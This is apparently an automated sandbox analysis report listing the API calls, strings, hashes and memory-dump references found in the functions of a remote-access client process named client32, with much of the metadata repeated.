PostMessageA.USER32(00010480,00000800,00000000,00000000), ref: 1104B2A4

Strings

Client, xrefs: 1104B13C
tVPq, xrefs: 1104B165
UnloadMirrorOnEndView, xrefs: 1104B137

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessagePost$__wcstoi64
String ID: Client$UnloadMirrorOnEndView$tVPq
API String ID: 1802880851-2026197083
Opcode ID: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
Instruction ID: 72b0dfb70f0a874fb1e004092d90b5695b323917c743566986231bfe2b7fd1fa
Opcode Fuzzy Hash: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
Instruction Fuzzy Hash: E6412775B025257BD311DBA4CC85FEBB7AABF89708F1081A9F61497284DB70B900CBD4

Function 685A7810 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 125networkCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 685A783E
#16.WSOCK32(?,?,?,00000000), ref: 685A78F6
WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 685A7924
wsprintfA.USER32 ref: 685A7937
OutputDebugStringA.KERNEL32(?), ref: 685A7944

Strings

(Httputil.c) Error %d reading HTTP response header, xrefs: 685A7931
hbuf->data, xrefs: 685A78CF
, xrefs: 685A7863
httputil.c, xrefs: 685A78CA

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: DebugErrorLastOutputString_memmovewsprintf
String ID: $(Httputil.c) Error %d reading HTTP response header$hbuf->data$httputil.c
API String ID: 2214935655-769711038
Opcode ID: d3294f3d40910b0a7d1253ea00ffe4116301ffe90f485bc4105bf2adf1f72d1d
Instruction ID: f2154b5dc352582d8d2516ec355aa41ff31728e57bd543d3bf0962d10700200e
Opcode Fuzzy Hash: d3294f3d40910b0a7d1253ea00ffe4116301ffe90f485bc4105bf2adf1f72d1d
Instruction Fuzzy Hash: 39417F79A006019FD720DF68DC90E6FB7F9EF94314B40882DE89A87645E770F805CB90

Function 68596A40 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 114libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(wininet.dll,00002000,00000000,00000000), ref: 68596ABD
GetProcAddress.KERNEL32(00000000,InternetQueryOptionA), ref: 68596ACF
FreeLibrary.KERNEL32(00000000), ref: 68596AFC
wsprintfA.USER32 ref: 68596B52
_free.LIBCMT ref: 68596B96
_free.LIBCMT ref: 68596BA2

Strings

http://%s/testpage.htm, xrefs: 68596B40
InternetQueryOptionA, xrefs: 68596AC9
wininet.dll, xrefs: 68596A80

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Library_free$AddressFreeLoadProcwsprintf
String ID: InternetQueryOptionA$http://%s/testpage.htm$wininet.dll
API String ID: 3641295650-227718810
Opcode ID: d28fc30bc7f22f65c4cdcbfac7eb13015de32ca2f695877d712c5fab75621993
Instruction ID: cb99a9dd6800f14f6b2b663a2d966b207bf04046f18c61fd20ebd337a353d78c
Opcode Fuzzy Hash: d28fc30bc7f22f65c4cdcbfac7eb13015de32ca2f695877d712c5fab75621993
Instruction Fuzzy Hash: 02413271D402199BDB65DF68CD81FEEB7F8AB44304F4181E9E91DA7200EB709E849F90

Function 68597C60 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 97COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68597C8D
EnterCriticalSection.KERNEL32(685DB898,?,00000000,a3Zh,?), ref: 68597D18
LeaveCriticalSection.KERNEL32(685DB898,?,00000000,a3Zh,?), ref: 68597D68
EnterCriticalSection.KERNEL32(685DB898,?,00000000,a3Zh,?), ref: 68597D6F
LeaveCriticalSection.KERNEL32(685DB898,?,00000000,a3Zh,?), ref: 68597D83

Strings

b, xrefs: 68597D4D
a3Zh, xrefs: 68597C77
RESULT, xrefs: 68597CB0
&-Zh, xrefs: 68597C74, 68597C97, 68597CEF

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$_memset
String ID: &-Zh$RESULT$a3Zh$b
API String ID: 920729587-1441757321
Opcode ID: 220b023eb8127222d7d0c180881d024c62cf0d73a237a42eb98f46d5a5d6e3b4
Instruction ID: ac7a46e2b0fec28522facf660daac6583b21bd0ec8407300fde942649d2bf082
Opcode Fuzzy Hash: 220b023eb8127222d7d0c180881d024c62cf0d73a237a42eb98f46d5a5d6e3b4
Instruction Fuzzy Hash: AF3172B5D00209AFDF10DFA4C841BEEBBF5EB48300F91406AE959E7240EB349A44CBA5

Function 11027310 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 1102732F
OpenProcessToken.ADVAPI32(00000000), ref: 11027336
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 11027358
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 11027378
LookupPrivilegeNameA.ADVAPI32(00000000,00000004,?,?), ref: 11027399
_free.LIBCMT ref: 110273C4
CloseHandle.KERNEL32(?), ref: 110273D6

Strings

Luid Low=%x, High=%x, Attr=%x, name=%s, xrefs: 110273AE
@, xrefs: 1102738E

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$CloseCurrentHandleLookupNameOpenPrivilege_free
String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s
API String ID: 2058255784-3275751932
Opcode ID: 197ac4509fec381f452636feafc602bd77caf5c095f428f5ea260a9a992fb28b
Instruction ID: ade80763f836c408a2a1d446ea8312ce3e6dd7fa4b179276d35611dba123a850
Opcode Fuzzy Hash: 197ac4509fec381f452636feafc602bd77caf5c095f428f5ea260a9a992fb28b
Instruction Fuzzy Hash: D42176B5D0021AAFD710DFE4DC85EAFBBBDEF44704F108119EA15A7240D770A906CBA1

Function 110570C0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 228COMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

GetTickCount.KERNEL32 ref: 11057136

Part of subcall function 11157010: LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
Part of subcall function 11157010: GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 11157084
Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 11157094
Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111570B4

GetTickCount.KERNEL32 ref: 11057293

Strings

Client, xrefs: 110570FA
e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 110572D6, 11057302
Info. NC_WIRELESS took %d ms, xrefs: 110572A2
gfff, xrefs: 11057112
IsA(), xrefs: 110572DB, 11057307
DisableWirelessInfo, xrefs: 110570F5

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$CountTick$LibraryLoad__wcstoi64
String ID: Client$DisableWirelessInfo$Info. NC_WIRELESS took %d ms$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h$gfff
API String ID: 1442689885-2337161965
Opcode ID: 3312380c41981f34bd337f774f96d03f519effdcfe3ca8d7960d65f644104a37
Instruction ID: 84ed5054cfcb45ae474b39cb997af099e397576dfe613bc4edcee20f92af9c19
Opcode Fuzzy Hash: 3312380c41981f34bd337f774f96d03f519effdcfe3ca8d7960d65f644104a37
Instruction Fuzzy Hash: F8916D75E0065E9FCB45CF94C884AEEF7B6BF58318F104158E819AB281DB30AE45CBA1

Function 685A5DF0 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 206COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 685A5E36

Part of subcall function 685A33A0: wsprintfA.USER32 ref: 685A34FD

Part of subcall function 685A7D00: __vswprintf.LIBCMT ref: 685A7D26

Strings

226546, xrefs: 685A5ED4, 685A5F15
>???.???.???.???, xrefs: 685A5F6A
0x0x0x0, xrefs: 685A5FCE
PINserver, xrefs: 685A5E47
CLIENT_NAME=%s, xrefs: 685A5EDF, 685A5F20
CMD=CONTROL_PIN_REQUEST, xrefs: 685A5EC9
CMD=CLIENT_PIN_REQUEST, xrefs: 685A5F0A

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: __vswprintf_memsetwsprintf
String ID: 0x0x0x0$226546$>???.???.???.???$CLIENT_NAME=%s$CMD=CLIENT_PIN_REQUEST$CMD=CONTROL_PIN_REQUEST$PINserver
API String ID: 518437271-2390828419
Opcode ID: c08184576ff0594fb756a8d6428282d34dbe2dd95cf6d13f9cafde797af372fa
Instruction ID: f435b78c6af9bacf1239b75f10be07d28a54f5489d6bb42726ba41e9fd131857
Opcode Fuzzy Hash: c08184576ff0594fb756a8d6428282d34dbe2dd95cf6d13f9cafde797af372fa
Instruction Fuzzy Hash: 54715875C40258EEDB20DB68CC90FEDB7B9EB44214F8086E9E519B7180E7315E85CF65

Function 685ACE00 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 685ACE20

Part of subcall function 685B1913: std::exception::exception.LIBCMT ref: 685B1928
Part of subcall function 685B1913: __CxxThrowException@8.LIBCMT ref: 685B193D
Part of subcall function 685B1913: std::exception::exception.LIBCMT ref: 685B194E

_memmove.LIBCMT ref: 685ACEA7
_memmove.LIBCMT ref: 685ACECB
_memmove.LIBCMT ref: 685ACF05
_memmove.LIBCMT ref: 685ACF21
std::exception::exception.LIBCMT ref: 685ACF6B
__CxxThrowException@8.LIBCMT ref: 685ACF80

Strings

deque<T> too long, xrefs: 685ACE1B

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: fec3d98fae86e9cfe92e3861efac64ac5190c1e9e7bdaaa51ed1b3252e48068e
Instruction ID: 080d0a4009334ba8dc14d8fc1d2dcfedfee5e2f09b38f29e0c302ea86ba7d685
Opcode Fuzzy Hash: fec3d98fae86e9cfe92e3861efac64ac5190c1e9e7bdaaa51ed1b3252e48068e
Instruction Fuzzy Hash: 2D4194B2E00104ABDB14CE68CCD1AAEB7F9AFD4214F998669DC19D7344EB34EE018790

Function 110CF280 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110CF2A0

Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE

_memmove.LIBCMT ref: 110CF327
_memmove.LIBCMT ref: 110CF34B
_memmove.LIBCMT ref: 110CF385
_memmove.LIBCMT ref: 110CF3A1
std::exception::exception.LIBCMT ref: 110CF3EB
__CxxThrowException@8.LIBCMT ref: 110CF400

Strings

deque<T> too long, xrefs: 110CF29B

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: ca0d9d9c1b3117fae71b95f011d40ae9033231cd0910b8171d4419a53fd285b4
Instruction ID: 3f2339a9076695d70661dcab859014021b6c0d6f22495f28215c516d49704129
Opcode Fuzzy Hash: ca0d9d9c1b3117fae71b95f011d40ae9033231cd0910b8171d4419a53fd285b4
Instruction Fuzzy Hash: 6541E876E00115ABDB04CE68CC81BAEF7F6EF80614F19C6A9DC15D7344EA34EA418B91

Function 68593E90 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 68593EB0

Part of subcall function 685B1913: std::exception::exception.LIBCMT ref: 685B1928
Part of subcall function 685B1913: __CxxThrowException@8.LIBCMT ref: 685B193D
Part of subcall function 685B1913: std::exception::exception.LIBCMT ref: 685B194E

_memmove.LIBCMT ref: 68593F39
_memmove.LIBCMT ref: 68593F5D
_memmove.LIBCMT ref: 68593F97
_memmove.LIBCMT ref: 68593FB3
std::exception::exception.LIBCMT ref: 68593FFD
__CxxThrowException@8.LIBCMT ref: 68594012

Strings

deque<T> too long, xrefs: 68593EAB

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: 11eb3b7e1b40678d30a6178467c09a66cc5a929578326e91b88e1ec3bacf282b
Instruction ID: 78146cfc075f1b48c8fec3ca5ed38b3b678857dfb0320e8016d947741336f648
Opcode Fuzzy Hash: 11eb3b7e1b40678d30a6178467c09a66cc5a929578326e91b88e1ec3bacf282b
Instruction Fuzzy Hash: 66418472E00204DBDF14CE68CC91AEEB7FAEBD4214B598669EC19D7344E635EE418790

Function 11125040 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11125060

Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE

_memmove.LIBCMT ref: 111250EA
_memmove.LIBCMT ref: 1112510E
_memmove.LIBCMT ref: 11125148
_memmove.LIBCMT ref: 11125164
std::exception::exception.LIBCMT ref: 111251AE
__CxxThrowException@8.LIBCMT ref: 111251C3

Strings

deque<T> too long, xrefs: 1112505B

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: a4ca0833f89cb949e8c6ff4a971e5aaf4e212e7777e7c70b2ce6ff60b8d225c5
Instruction ID: 0f323eff97a08ef0bfb1d310de9271f6685152ce05bf58ee348bace92ff13d14
Opcode Fuzzy Hash: a4ca0833f89cb949e8c6ff4a971e5aaf4e212e7777e7c70b2ce6ff60b8d225c5
Instruction Fuzzy Hash: 0541E776E00115ABDB54CE68CCC1AEEF7E5EF84214F69C668D81AD7344EA34EA41CBD0

Function 68597EF0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68597F26
EnterCriticalSection.KERNEL32(685DB898,?,?,a3Zh,?), ref: 68597FF9
LeaveCriticalSection.KERNEL32(685DB898,?,?,a3Zh,?), ref: 68598047
EnterCriticalSection.KERNEL32(685DB898,?,?,a3Zh,?), ref: 68598052
LeaveCriticalSection.KERNEL32(685DB898,?,?,a3Zh,?), ref: 6859806A

Strings

b, xrefs: 68598032
a3Zh, xrefs: 68597F13
RESULT, xrefs: 68597F50

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$_memset
String ID: RESULT$a3Zh$b
API String ID: 920729587-926050548
Opcode ID: aa468f9bd3f7d3300ee23661afa10fbea0540181922cf68e47308bcde5dafe8d
